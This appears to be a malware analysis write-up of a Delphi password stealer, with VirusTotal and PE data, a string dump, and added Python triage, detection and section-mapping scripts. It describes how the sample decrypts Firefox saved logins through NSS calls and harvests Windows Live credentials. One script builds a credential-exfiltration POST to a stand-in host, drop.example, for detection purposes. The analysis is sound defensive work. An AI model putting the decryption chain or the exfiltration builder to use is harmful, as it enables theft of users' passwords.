Reverse Engineering on Linux

A few days ago I was chatting on Skype with a friend of mine and he said: "Have a look at this blog, you'll surely like it, it's by a guy who does RE (reverse engineering)". I looked at it for a bit and told him: "But it's on Windows!", and he answered: "Well, how else do you want to do reverse engineering???"

...

For this report I used IDA Pro on Debian GNU/Linux and the Qemu Zero-wine image, also on Debian GNU/Linux.


MD5 Sum: ddafe247beef63ccb926fbf8f69743fa

VirusTotal.com report:


Antivirus Version Last Update Result
a-squared 4.5.0.24 2009.09.25 Trojan-PWS.Win32.Stealer!IK
AhnLab-V3 5.0.0.2 2009.09.24 Win-Trojan/Stealer.61952
AntiVir 7.9.1.25 2009.09.25 TR/Agent.61952
Antiy-AVL 2.0.3.7 2009.09.25 Trojan/Win32.Stealer.gen
Authentium 5.1.2.4 2009.09.25 -
Avast 4.8.1351.0 2009.09.24 -
AVG 8.5.0.412 2009.09.25 Generic13.BYDC
BitDefender 7.2 2009.09.25 Trojan.Generic.2463633
CAT-QuickHeal 10.00 2009.09.25 -
ClamAV 0.94.1 2009.09.25 Trojan.Spy-64234
Comodo 2432 2009.09.25 TrojWare.Win32.PSW.Delf.~B
DrWeb 5.0.0.12182 2009.09.25 -
eSafe 7.0.17.0 2009.09.24 -
eTrust-Vet 31.6.6760 2009.09.25 -
F-Prot 4.5.1.85 2009.09.24 -
F-Secure 8.0.14470.0 2009.09.25 Trojan-PSW.Win32.Stealer.w
Fortinet 3.120.0.0 2009.09.25 W32/Stealer.W!tr.pws
GData 19 2009.09.25 Trojan.Generic.2463633
Ikarus T3.1.1.72.0 2009.09.25 Trojan-PWS.Win32.Stealer
Jiangmin 11.0.800 2009.09.25 Trojan/PSW.Stealer.bn
K7AntiVirus 7.10.853 2009.09.24 -
Kaspersky 7.0.0.125 2009.09.25 Trojan-PSW.Win32.Stealer.w
McAfee 5751 2009.09.24 -
McAfee+Artemis 5751 2009.09.24 -
McAfee-GW-Edition 6.8.5 2009.09.25 Heuristic.LooksLike.Win32.PasswordStealer.H
Microsoft 1.5005 2009.09.23 -
NOD32 4456 2009.09.25 Win32/PSW.Delf.NSI
Norman 6.01.09 2009.09.24 -
nProtect 2009.1.8.0 2009.09.25 Trojan-PWS/W32.Agent.62464.C
Panda 10.0.2.2 2009.09.24 Trj/AOLPS.UB
PCTools 4.4.2.0 2009.09.25 -
Prevx 3.0 2009.09.25 -
Rising 21.48.43.00 2009.09.25 -
Sophos 4.45.0 2009.09.25 Troj/PWS-BEG
Sunbelt 3.2.1858.2 2009.09.24 -
Symantec 1.4.4.12 2009.09.25 -
TheHacker 6.5.0.2.017 2009.09.24 -
TrendMicro 8.950.0.1094 2009.09.25 -
VBA32 3.12.10.11 2009.09.25 Trojan-PSW.Win32.Stealer.w
ViRobot 2009.9.25.1956 2009.09.25 -
VirusBuster 4.6.5.0 2009.09.24 -
Additional information
File size: 62464 bytes
MD5...: ddafe247beef63ccb926fbf8f69743fa
SHA1..: fd13aa01f63ec5ab53b8dc79ad8acf6ab929328d
SHA256: 4384cee81b789e08c0ffb8911537020205f1de2f15ee683700dc558b1e433ade
ssdeep: 1536:HGIy8OgkxGVZ0QexBwNeEgm0dh/kkvZ9/9x:HGIy8rV3enFEYIU/9x
PEiD..: -
PEInfo: PE Structure information

( base data )
entrypointaddress.: 0xc134
timedatestamp.....: 0x2a425e19 (Fri Jun 19 22:22:17 1992)
machinetype.......: 0x14c (I386)

( 9 sections )
name viradd virsiz rawdsiz ntrpy md5
.text 0x1000 0xa76c 0xa800 6.55 a1e897ffbf736747891241d5bcb92c62
.itext 0xc000 0xfd8 0x1000 5.83 096f208a28c87836ee442ac54ecde283
.data 0xd000 0xaf8 0xc00 1.99 dc14823419ba6a245f722b673d59601b
.bss 0xe000 0x3804 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e
.idata 0x12000 0xb9e 0xc00 4.84 bba371f3713ddeb9be7ba133b2e7c278
.tls 0x13000 0x8 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e
.rdata 0x14000 0x18 0x200 0.21 837fbcb55aef26898bcc1cf60d98712a
.reloc 0x15000 0xe6c 0x1000 6.36 1f6a3d5d729113c1c56409d79e5465c4
.rsrc 0x16000 0xd54 0xe00 3.63 f6771ce6bb2b37a7fc0fa79cbdfe3727

( 10 imports )
> oleaut32.dll: SysFreeString, SysReAllocStringLen, SysAllocStringLen
> advapi32.dll: RegQueryValueExA, RegOpenKeyExA, RegCloseKey
> user32.dll: GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
> kernel32.dll: GetACP, Sleep, VirtualFree, VirtualAlloc, GetTickCount, QueryPerformanceCounter, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
> kernel32.dll: TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
> user32.dll: TranslateMessage, MessageBoxA, LoadStringA, GetSystemMetrics, DispatchMessageA, CharNextA, CharToOemA
> kernel32.dll: WriteFile, VirtualQuery, Sleep, SizeofResource, ReadFile, LockResource, LoadResource, LoadLibraryA, GetVersionExA, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetFileSize, GetFileAttributesA, GetEnvironmentVariableA, GetDiskFreeSpaceA, GetCurrentProcess, GetComputerNameA, GetCPInfo, FreeLibrary, FindResourceA, EnumCalendarInfoA, DeleteFileA, CreateFileA, CloseHandle
> advapi32.dll: RegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, GetUserNameA
> advapi32.dll: CredEnumerateA
> wsock32.dll: WSACleanup, WSAStartup, gethostbyname, socket, send, inet_ntoa, inet_addr, htons, connect, closesocket

( 0 exports )
RDS...: NSRL Reference Data Set
-
pdfid.: -
trid..: Win32 Executable Generic (38.4%)
Win32 Dynamic Link Library (generic) (34.1%)
Win16/32 Executable Delphi generic (9.3%)
Generic Win/DOS Executable (9.0%)
DOS Executable Generic (9.0%)
ThreatExpert info: http://www.threatexpert.com/report.aspx?md5=ddafe247beef63ccb926fbf8f69743fa
sigcheck:
publisher....: n/a
copyright....: n/a
product......: n/a
description..: n/a
original name: n/a
internal name: n/a
file version.: n/a
comments.....: n/a
signers......: -
signing date.: -
verified.....: Unsigned


Let's look at it in a bit more detail.

The program is written in Delphi. Besides the FastMM banner below, two things in the VirusTotal PE data give it away: the timestamp 0x2a425e19 (19 June 1992) is the fixed value the Delphi linker writes into every executable, and the .itext section is where Delphi places its RTL initialization code.

FastMM Borland Edition
2004, 2005 Pierre le Riche / Professional Software Development

The virus tries to grab Firefox and MSN passwords.

For Firefox it does what Firefox itself does: it assembles the registry path to the Install Directory from the fragments below (SOFTWARE\, Mozilla, Firefox, CurrentVersion, \Main, Install Directory), loads Firefox's own NSPR/NSS runtime from that directory (nspr4.dll, plc4.dll, plds4.dll, mozcrt19.dll, sqlite3.dll, nssutil3.dll, softokn3.dll, nss3.dll), finds the profile through %APPDATA%\Mozilla\Firefox\profiles.ini (section Profile0, key Path), and then calls NSS_Init on that profile, PK11_GetInternalKeySlot, PK11_Authenticate, and PK11SDR_Decrypt on each stored field after base64-decoding it with NSSBase64_DecodeBuffer. If the user has set a master password, PK11_Authenticate fails without it; that is what the "PK11_Authenticate Failed!" message is for, and it is why a master password is the protection that matters against this part of the stealer. Entries such as PSWV and ZYYd are not strings at all: they are the ASCII rendering of Delphi's usual register-saving prologue (push eax/ebx/edi/esi) and try/finally epilogue (5A 59 59 64: pop edx, pop ecx, pop ecx, mov fs:[eax],edx) and can be ignored.

SOFTWARE\
Mozilla
Firefox
CurrentVersion
\Main
Install Directory
PSWV
ZYYd
nspr4.dll
plc4.dll
plds4.dll
mozcrt19.dll
sqlite3.dll
nssutil3.dll
softokn3.dll
nss3.dll
NSS_Init
NSSBase64_DecodeBuffer
PK11_GetInternalKeySlot
PK11_Authenticate
PK11SDR_Decrypt
NSS_Shutdown
PK11_FreeSlot
APPDATA
\Mozilla\Firefox\profiles.ini
Path
Profile0
\Mozilla\Firefox\
--------------------
--------------------
(unnamed value)
PK11_Authenticate Failed!
PK11_GetInternalKeySlot Failed!
NSS_Init Failed!
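As an added example (not the author's tooling, nor code from the sample), here is a small Python triage script that takes a string list like the one above, throws away the Delphi code-byte artifacts and sorts the rest into the indicator families this sample shows. The string list inside it is constructed from the dump in this post; the bucket names and capability labels are the example's own.

```python
"""Bucket the strings pulled out of a suspected Delphi password stealer.

Added example for this write-up, not the original author's code or tooling.
It takes the kind of list that `strings` or IDA's Strings window produces,
drops ASCII that is really x86/Delphi instruction bytes, and sorts the rest
into the indicator families seen in this sample. SAMPLE_STRINGS is
constructed from the strings quoted in the write-up; the bucket names and
the capability labels are this example's own.
"""
import re

# Byte sequences Delphi emits in almost every function, which `strings`
# prints as if they were text:
#   "SVW"  = 53 56 57     push ebx / push esi / push edi        (prologue)
#   "QSVW" = 51 53 56 57  push ecx / push ebx / push esi / push edi
#   "PSWV" = 50 53 57 56  push eax / push ebx / push edi / push esi
#   "ZYYd" = 5A 59 59 64  pop edx / pop ecx / pop ecx / mov fs:[eax],edx
#                         (the try/finally epilogue)
# "SVW3" and "$ZXw" are the same kind of thing with a neighbouring byte
# glued on, hence the optional extra character in the patterns.
_CODE_BYTE_PATTERNS = (
    re.compile(r"^[PQ]?SVW.?$"),
    re.compile(r"^PSWV$"),
    re.compile(r"^.?ZYYd$"),
    re.compile(r"^.?Z[XY]w$"),
)

_BUCKETS = {
    # NSS/PK11 symbols resolved with GetProcAddress, and their error messages
    "firefox_nss_api": re.compile(r"^(NSS_\w+|NSSBase64_\w+|PK11\w+)"),
    # Firefox's own crypto runtime, loaded from its install directory
    "firefox_runtime_dll": re.compile(
        r"^(nspr4|plc4|plds4|mozcrt19|sqlite3|nssutil3|softokn3|nss3)\.dll$",
        re.IGNORECASE),
    # registry fragments and the profiles.ini lookup used to find the profile
    "firefox_profile_lookup": re.compile(
        r"^(SOFTWARE\\|Mozilla|Firefox|CurrentVersion|\\Main|Install Directory|"
        r"APPDATA|\\Mozilla\\Firefox.*|Profile0|Path)$"),
    # CredEnumerateA filter for Windows Live Messenger credentials
    "windows_live_cred": re.compile(r"^WindowsLive:name=", re.IGNORECASE),
    # pieces of the hand-built HTTP POST used to send the report
    "exfil_http": re.compile(
        r"^(POST /|HTTP/1\.1|Host:|Connection: close|Accept: text/html|"
        r"Content-Length:|Content-Type: application/x-www-form-urlencoded|"
        r"mail=|&message=)$"),
    # keys of the embedded configuration
    "config_key": re.compile(r"^(HOST|USER|PASS|LINK|MAIL|MAILACTIVE|ANTI\d{1,2})$"),
}

# Constructed from the strings quoted in the write-up (order as seen there).
SAMPLE_STRINGS = [
    "SOFTWARE\\", "Mozilla", "Firefox", "CurrentVersion", "\\Main",
    "Install Directory", "PSWV", "ZYYd", "nspr4.dll", "plc4.dll", "plds4.dll",
    "mozcrt19.dll", "sqlite3.dll", "nssutil3.dll", "softokn3.dll", "nss3.dll",
    "NSS_Init", "NSSBase64_DecodeBuffer", "PK11_GetInternalKeySlot",
    "PK11_Authenticate", "PK11SDR_Decrypt", "NSS_Shutdown", "PK11_FreeSlot",
    "APPDATA", "\\Mozilla\\Firefox\\profiles.ini", "Path", "Profile0",
    "PK11_Authenticate Failed!", "NSS_Init Failed!",
    "SVW3", "QSVW", "$ZXw", "HOST", "USER", "PASS", "LINK", "MAIL",
    "ANTI1", "ANTI15", "TRUE", "WindowsLive:name=*", "Email:", "Password:",
    "-------FIREFOX------", "MAILACTIVE", "mail=", "&message=", "POST /",
    "HTTP/1.1", "Connection: close",
    "Content-Type: application/x-www-form-urlencoded", "Content-Length:",
    "Host:", "Accept: text/html",
]


def is_code_bytes(s):
    """True for ASCII that is really Delphi/x86 instruction bytes."""
    return any(p.match(s) for p in _CODE_BYTE_PATTERNS)


def classify(strings):
    """Return {bucket: [strings]}; unmatched strings land in 'other'."""
    buckets = {name: [] for name in _BUCKETS}
    buckets["code_bytes"] = []
    buckets["other"] = []
    for s in strings:
        s = s.strip()
        if not s:
            continue
        if is_code_bytes(s):
            buckets["code_bytes"].append(s)
            continue
        for name, pattern in _BUCKETS.items():
            if pattern.match(s):
                buckets[name].append(s)
                break
        else:
            buckets["other"].append(s)
    return buckets


def capabilities(buckets):
    """Turn the buckets into the capability labels an analyst would report."""
    caps = []
    if buckets["firefox_nss_api"] and buckets["firefox_runtime_dll"]:
        caps.append("decrypts Firefox saved logins via NSS")
    if buckets["firefox_profile_lookup"]:
        caps.append("locates Firefox profile via registry + profiles.ini")
    if buckets["windows_live_cred"]:
        caps.append("harvests Windows Live credentials from Credential Manager")
    if buckets["exfil_http"]:
        caps.append("exfiltrates via HTTP POST (form-urlencoded)")
    if buckets["config_key"]:
        caps.append(f"{len(buckets['config_key'])} embedded config keys")
    return caps


if __name__ == "__main__":
    result = classify(SAMPLE_STRINGS)
    for name, items in result.items():
        print(f"{name:24s} {items}")
    print("capabilities:", capabilities(result))
```

Feed it `strings -a sample.exe` output (one string per line) and the code_bytes bucket alone usually removes a third of the noise a Delphi binary produces; the capability list is what goes into the triage note.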


decrypting them and then connecting to a remote host. The upper-case entries HOST, USER, PASS, LINK and MAIL (and, further down, MAILACTIVE and ANTI1 to ANTI15) read like the keys of an embedded configuration; the sample imports GetPrivateProfileStringA and FindResourceA/LoadResource, which is how such a configuration is normally read. SVW3, QSVW, $ZXw and ZYYd are, again, code bytes rather than text; "http" is the only real string among them.

SVW3
ZYYd
ZYYd
ZYYd
http
ZYYd
ZYYd
QSVW
$ZXw
ZYYd
ZYYd
ZYYd
HOST
3bkdhkvT5gQ
USER
PASS
LINK
it is also sent by mail
MAIL
ANTI1
TRUE

parts of a script to disable antivirus software (that is how ANTI1 to ANTI15 read; the dump itself only shows fifteen numbered keys next to the other configuration keys, so treat this as an interpretation until the code that reads them has been looked at in IDA)

ANTI2
ANTI3
ANTI4
ANTI5
ANTI6
ANTI7
ANTI8
ANTI9
ANTI10
ANTI11
ANTI12
ANTI13
ANTI14
ANTI15

trying to send them, after formatting both the MSN and the Firefox passwords. WindowsLive:name=* is the filter the sample passes to CredEnumerateA (advapi32.dll, in the import table above): it enumerates the Windows Live Messenger credentials saved in the Windows Credential Manager, which is where the MSN passwords come from. Email:/Password: and the MSN/FIREFOX separator lines are the layout of the report.

--------------------
---------MSN--------
WindowsLive:name=*
Email:
Password:
FIREFOX
-------FIREFOX------
update
It creates the file c:/pass.txt (the /pass. and .txt fragments) and then posts the report: mail= and &message= are the two fields of an application/x-www-form-urlencoded body, sent with the request below. The import table shows raw wsock32 calls (socket, connect, send) and no wininet.dll, so the HTTP request is built by hand from these strings.
/pass.
.txt
MAILACTIVE
mail=
&message=
POST /
HTTP/1.1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length:
Host:
Accept: text/html
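Added example, not code from the sample or its author: a Python reconstruction of the upload request these strings imply, together with a detector that recognises such an upload in a captured request. The mail/message form fields, the MSN/FIREFOX separators and the Email:/Password: labels come from the strings above; the header order, the host name and the credentials are assumptions used only to build a realistic sample.

```python
"""Reconstruct and detect the stealer's HTTP exfiltration request.

Added example for this write-up, not code from the sample or its author.
The request layout (POST /, HTTP/1.1, Connection: close, form-urlencoded
body with a `mail` and a `message` field) and the report layout (the MSN and
FIREFOX separator lines, Email:/Password: labels) are taken from the strings
in the write-up; the header order, the host name and the credentials below
are assumptions used only to build a realistic sample.
"""
from urllib.parse import parse_qs, urlencode

MSN_MARK = "---------MSN--------"
FIREFOX_MARK = "-------FIREFOX------"


def build_report(msn_creds, firefox_creds):
    """Lay out stolen credentials the way the stealer's strings suggest."""
    lines = ["-" * 20, MSN_MARK]
    for email, pw in msn_creds:
        lines += [f"Email: {email}", f"Password: {pw}"]
    lines.append(FIREFOX_MARK)
    for url, user, pw in firefox_creds:
        lines += [url, f"Email: {user}", f"Password: {pw}"]
    return "\n".join(lines) + "\n"


def build_exfil_request(host, mail, report):
    """Build the raw POST the strings describe (header order is assumed)."""
    body = urlencode({"mail": mail, "message": report}).encode()
    headers = (
        "POST / HTTP/1.1\r\n"
        "Connection: close\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        f"Host: {host}\r\n"
        "Accept: text/html\r\n\r\n"
    )
    return headers.encode() + body


def detect_exfil(raw):
    """Return a finding dict if `raw` looks like this stealer's upload, else None.

    Works on any captured HTTP request, e.g. one carved out of a pcap.
    """
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return None
    lines = head.decode("latin-1").split("\r\n")
    method, _, _ = lines[0].partition(" ")
    if method != "POST":
        return None
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    if "application/x-www-form-urlencoded" not in headers.get("content-type", ""):
        return None
    fields = parse_qs(body.decode("latin-1"), keep_blank_values=True)
    if "mail" not in fields or "message" not in fields:
        return None
    message = fields["message"][0]
    sections = [m for m in (MSN_MARK, FIREFOX_MARK) if m in message]
    if not sections:
        return None
    return {
        "host": headers.get("host", ""),
        "mail": fields["mail"][0],
        "sections": sections,
        "credential_lines": message.count("Password:"),
    }


if __name__ == "__main__":
    # Constructed sample: one Messenger login and one Firefox login.
    report = build_report(
        [("alice@hotmail.example", "hunter2")],
        [("https://mail.example", "alice", "s3cret")],
    )
    raw = build_exfil_request("drop.example", "dropbox@example.org", report)
    print(raw.decode())
    print(detect_exfil(raw))
```

The detector keys on the body layout rather than on the host, because the HOST and MAIL values are configuration and change per build; the separator lines and the Email:/Password: labels are compiled into the binary and survive a change of drop site.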

and the process ends.

Entry point: 0000C134
Found OEP: 0040A688

The file is not packed (PEiD found nothing), so the address labelled OEP is not an unpacked entry point. The PE entry point 0xC134 falls in the .itext section (0xC000-0xCFD8), where Delphi places its RTL start-up code; 0x40A688 is RVA 0xA688 inside .text (assuming the default image base 0x400000), i.e. the program's own code after the RTL has initialised.
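Added example (not the author's code): a Python snippet that checks those two addresses against the section table from the VirusTotal listing and runs the cheap packer heuristics one applies before trusting an "OEP". The section data is copied from the listing; the image base 0x400000 is an assumption, since the listing does not show it.

```python
"""Map entry points onto the section table and run simple packer checks.

Added example for this write-up, not the author's tooling. SECTIONS is
constructed from the VirusTotal section listing in the write-up (name,
virtual address, virtual size, raw size, entropy). The image base 0x400000
is an assumption: the listing does not show it, but it is the default for
Delphi and for most 32-bit Windows executables.
"""

IMAGE_BASE = 0x400000  # assumed, see module docstring

# (name, virtual address, virtual size, raw data size, entropy)
SECTIONS = [
    (".text",  0x1000,  0xa76c, 0xa800, 6.55),
    (".itext", 0xc000,  0xfd8,  0x1000, 5.83),
    (".data",  0xd000,  0xaf8,  0xc00,  1.99),
    (".bss",   0xe000,  0x3804, 0x0,    0.00),
    (".idata", 0x12000, 0xb9e,  0xc00,  4.84),
    (".tls",   0x13000, 0x8,    0x0,    0.00),
    (".rdata", 0x14000, 0x18,   0x200,  0.21),
    (".reloc", 0x15000, 0xe6c,  0x1000, 6.36),
    (".rsrc",  0x16000, 0xd54,  0xe00,  3.63),
]


def rva_to_section(rva, sections=SECTIONS):
    """Name of the section whose virtual range contains `rva`, or None."""
    for name, va, vsize, _raw, _entropy in sections:
        if va <= rva < va + vsize:
            return name
    return None


def va_to_section(va, sections=SECTIONS, image_base=IMAGE_BASE):
    """Same as rva_to_section, for a virtual address such as 0x40A688."""
    return rva_to_section(va - image_base, sections)


def packer_hints(entry_rva, sections=SECTIONS):
    """Cheap static packer heuristics; returns human-readable findings.

    For a Delphi binary the first finding is expected: .itext holds the RTL
    initialisation and the entry point, so on its own it is not a packer
    sign. It is when .text is tiny, a section has entropy close to 8, or the
    entry point sits in the last section that you should look for a packer.
    """
    hints = []
    ep_section = rva_to_section(entry_rva, sections)
    first_code = sections[0][0]
    if ep_section != first_code:
        hints.append(f"entry point {entry_rva:#x} is in {ep_section}, not {first_code}")
    for name, _va, vsize, raw, entropy in sections:
        if entropy >= 7.0:
            hints.append(f"{name} entropy {entropy:.2f} looks compressed/encrypted")
        # .bss and .tls legitimately have no raw data; anywhere else it means
        # the section is filled in at run time, which is what unpacker stubs do
        if raw == 0 and vsize and name not in (".bss", ".tls"):
            hints.append(f"{name} has no raw data but {vsize:#x} bytes virtual")
    return hints


if __name__ == "__main__":
    print("entry point 0xC134 ->", rva_to_section(0xC134))
    print("OEP 0x40A688      ->", va_to_section(0x40A688))
    for hint in packer_hints(0xC134):
        print("hint:", hint)
```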

Here is the string dump of the file (offset: string). Strings shown with spaces between the letters are UTF-16 strings. The weekday and month names, the runtime error texts and the DVCLAL/PACKAGEINFO resource names all belong to the Delphi RTL, and the names at the very end (lightstealer, WinSock, TlHelp32, CryptApi, WinInet, SysUtils, ...) are Delphi unit names, lightstealer presumably being the project itself. The Toolhelp32 names (CreateToolhelp32Snapshot, Process32First/Next) and IsDebuggerPresent at 0x91B1 are worth checking in IDA to see whether they are used for anti-debugging or merely pulled in by the RTL.

Code:


00000667: Professional Software Development
00001C7E: Unknown String
00001CDA: Unexpected Memory Leak
00002E80: RTL FPUMaskValue
00004B08: GetLongPathNameA
00004D54: Locales
00004D77: Locales
0000737C: ggg yyyy
000086EF: GetDiskFreeSpaceExA
00008CE4: CreateToolhelp32Snapshot
00008D06: Heap32ListFirst Heap32ListNext
00008D1E: Heap32First Heap32Next
00008D4A: Toolhelp32ReadProcessMemory Process32First
00008D59: Process32Next
00008D7A: Process32FirstW Process32NextW
00008D89: Thread32First
00008D98: Thread32Next
00008DA9: Module32First
00008DB8: Module32Next
00008DCA: Module32FirstW
00008DD9: Module32NextW
000091B1: IsDebuggerPresent
00009573: InsideTm
000095C4: username
0000968B: currentuser
0000969F: CurrentUser
00009D7B: Mozilla
00009D8B: Firefox
00009DBA: CurrentVersion
00009DE5: Install Directory
0000A586: DecodeBuffer
0000A59F: GetInternalKeySlot
0000A5B1: Authenticate
0000A5C3: Decrypt
0000A5D0: Shutdown
0000A5E1: FreeSlot
0000A5EB: APPDATA
0000A628: Profile0
0000A986: j j j j
0000B8A4: 3bkdhkvT5gQ USER
0000B8B8: DIR LINK
0000B922: ANTI10
0000B92A: ANTI11
0000B932: ANTI12
0000B93A: ANTI13
0000B942: ANTI14
0000B94A: ANTI15
0000B9E3: FIREFOX
0000BAAE: u update
0000BAE6: MAILACTIVE
0000BB55: close
0000BB8F: urlencoded
0000C375: Runtime error at 00000000
0000CC91: SysFreeString
0000CCA7: SysReAllocStringLen
0000CCBB: SysAllocStringLen
0000CCDC: RegQueryValueExA
0000CCED: RegOpenKeyExA
0000CCFB: RegCloseKey
0000CD19: GetKeyboardType
0000CD29: DestroyWindow
0000CD37: LoadStringA
0000CD45: MessageBoxA
0000CD51: CharNextA
0000CD68: GetACP
0000CD7F: VirtualFree
0000CD8E: VirtualAlloc
0000CD9E: GetTickCount
0000CDB9: QueryPerformanceCounter
0000CDCE: GetCurrentThreadId
0000CDDE: VirtualQuery
0000CDF5: WideCharToMultiByte
0000CE0B: MultiByteToWideChar
0000CE16: lstrlenA
0000CE23: lstrcpynA
0000CE34: LoadLibraryExA
0000CE47: GetThreadLocale
0000CE59: GetStartupInfoA
0000CE6A: GetProcAddress
0000CE7E: GetModuleHandleA
0000CE94: GetModuleFileNameA
0000CEA6: GetLocaleInfoA
0000CEB6: GetLastError
0000CEC9: GetCommandLineA
0000CED7: FreeLibrary
0000CEE8: FindFirstFileA
0000CEF5: FindClose
0000CF03: ExitProcess
0000CF0F: WriteFile
0000CF2A: UnhandledExceptionFilter
0000CF3C: SetFilePointer
0000CF4C: SetEndOfFile
0000CF59: RtlUnwind
0000CF64: ReadFile
0000CF76: RaiseException
0000CF86: GetStdHandle
0000CF95: GetFileSize
0000CFA3: GetFileType
0000CFB1: CreateFileA
0000CFBF: CloseHandle
0000CFDB: TlsSetValue
0000CFE9: TlsGetValue
0000CFF6: LocalAlloc
0000D00A: GetModuleHandleA
0000D02A: TranslateMessage
0000D039: MessageBoxA
0000D047: LoadStringA
0000D05A: GetSystemMetrics
0000D06E: DispatchMessageA
0000D07B: CharNextA
0000D088: CharToOemA
0000D0A3: WriteFile
0000D0B2: VirtualQuery
0000D0CC: SizeofResource
0000D0D8: ReadFile
0000D0E8: LockResource
0000D0F8: LoadResource
0000D108: LoadLibraryA
0000D119: GetVersionExA
0000D128: GetTickCount
0000D13B: GetThreadLocale
0000D14A: GetStdHandle
0000D15C: GetProcAddress
0000D178: GetPrivateProfileStringA
0000D18C: GetModuleHandleA
0000D1A2: GetModuleFileNameA
0000D1B4: GetLocaleInfoA
0000D1C3: GetFileSize
0000D1D8: GetFileAttributesA
0000D1F3: GetEnvironmentVariableA
0000D207: GetDiskFreeSpaceA
0000D21B: GetCurrentProcess
0000D22E: GetComputerNameA
0000D23B: GetCPInfo
0000D249: FreeLibrary
0000D259: FindResourceA
0000D26D: EnumCalendarInfoA
0000D27B: DeleteFileA
0000D289: CreateFileA
0000D297: CloseHandle
0000D2B8: RegQueryValueExA
0000D2C9: RegOpenKeyExA
0000D2D7: RegCloseKey
0000D2EA: OpenProcessToken
0000D2FA: GetUserNameA
0000D31A: CredEnumerateA
0000D334: WSACleanup
0000D342: WSAStartup
0000D353: gethostbyname
0000D35C: socket
0000D38F: connect
0000D39D: closesocket
0000E168: 7 74787h7
0000E88D: D V C L A L
0000E89D: F I R E F O X
0000E8AF: H O S T
0000E8C7: P A C K A G E I N F O
0000E8D1: P A S S
0000E8DB: U S E R
0000E8ED: N o v e m b e r
0000E8FF: D e c e m b e r
0000E945: S u n d a y
0000E953: M o n d a y
0000E963: T u e s d a y
0000E977: W e d n e s d a y
0000E989: T h u r s d a y
0000E997: F r i d a y
0000E9A9: S a t u r d a y
0000E9EB: J a n u a r y
0000E9FD: F e b r u a r y
0000EA09: M a r c h
0000EA15: A p r i l
0000EA27: J u n e
0000EA31: J u l y
0000EA3F: A u g u s t
0000EA53: S e p t e m b e r
0000EA63: O c t o b e r
0000EA73: I n v a l i d
0000EA83: v a r i a n t
0000EA8D: t y p e
0000EAA3: c o n v e r s i o n
0000EAB3: I n v a l i d
0000EAC3: v a r i a n t
0000EAD7: o p e r a t i o n
0000EAE7: I n v a l i d
0000EAF9: a r g u m e n t
0000EB0B: E x t e r n a l
0000EB1F: e x c e p t i o n
0000EB39: A s s e r t i o n
0000EB47: f a i l e d
0000EB5B: I n t e r f a c e
0000EB77: s u p p o r t e d
0000EB8B: E x c e p t i o n
0000EBA3: s a f e c a l l
0000EBB1: m e t h o d
0000EBCB: l i n e
0000EBE5: A b s t r a c t
0000EBF1: E r r o r
0000EBFF: A c c e s s
0000EC13: v i o l a t i o n
0000EC29: a d d r e s s
0000EC43: m o d u l e
0000EC6B: a d d r e s s
0000ECB3: I n v a l i d
0000ECC3: p o i n t e r
0000ECD7: o p e r a t i o n
0000ECE7: I n v a l i d
0000ECF3: c l a s s
0000ED13: t y p e c a s t 0 A c c e s s
0000ED27: v i o l a t i o n
0000ED3D: a d d r e s s
0000ED61: a d d r e s s
0000ED75: A c c e s s
0000ED89: v i o l a t i o n
0000ED95: S t a c k
0000EDA7: o v e r f l o w
0000EDB7: C o n t r o l
0000EDD9: P r i v i l e g e d
0000EDF1: i n s t r u c t i o n
0000EE05: E x c e p t i o n
0000EE1F: m o d u l e
0000EE5B: A p p l i c a t i o n
0000EE75: E r r o r 1 F o r m a t
0000EE8F: i n v a l i d
0000EEAF: i n c o m p a t i b l e
0000EEB9: w i t h
0000EECB: a r g u m e n t
0000EEE3: a r g u m e n t
0000EEF9: f o r m a t
0000EF13: V a r i a n t
0000EF21: m e t h o d
0000EF2D: c a l l s
0000EF49: s u p p o r t e d
0000EF53: R e a d
0000EF5F: W r i t e
0000EF6B: E r r o r
0000EF7D: c r e a t i n g
0000EF8D: v a r i a n t
0000EF9D: s a f e
0000EFA9: a r r a y
0000EFB9: V a r i a n t
0000EFC9: s a f e
0000EFD5: a r r a y
0000EFE1: i n d e x
0000EFFD: b o u n d s
0000F01B: m e m o r y
0000F02F: e r r o r
0000F03F: F i l e
0000F053: f o u n d
0000F063: I n v a l i d
0000F075: f i l e n a m e
0000F087: m a n y
0000F091: o p e n
0000F09D: f i l e s
0000F0A7: F i l e
0000F0B5: a c c e s s
0000F0C3: d e n i e d
0000F0CD: R e a d
0000F0DB: b e y o n d
0000F0F3: f i l e
0000F0FD: D i s k
0000F107: f u l l
0000F117: I n v a l i d
0000F127: n u m e r i c
0000F133: i n p u t
0000F145: D i v i s i o n
0000F155: z e r o
0000F161: R a n g e
0000F16D: c h e c k
0000F179: e r r o r
0000F189: I n t e g e r
0000F19B: o v e r f l o w
0000F1AB: I n v a l i d
0000F1BD: f l o a t i n g
0000F1C9: p o i n t
0000F1DD: o p e r a t i o n
0000F1EF: F l o a t i n g
0000F1FB: p o i n t
0000F20D: d i v i s i o n
0000F21D: z e r o
0000F22F: F l o a t i n g
0000F23B: p o i n t
0000F24D: o v e r f l o w
0000F25F: F l o a t i n g
0000F26B: p o i n t
0000F27F: u n d e r f l o w
0000F2CA: lightstealer
0000F2D4: WinSock
0000F2DE: KWindows
0000F2E6: UTypes
0000F2F0: SysInit
0000F2F9: System
0000F30B: TlHelp32
0000F316: CryptApi
0000F320: WinInet
0000F32B: SysUtils
0000F336: ImageHlp
0000F341: SysConst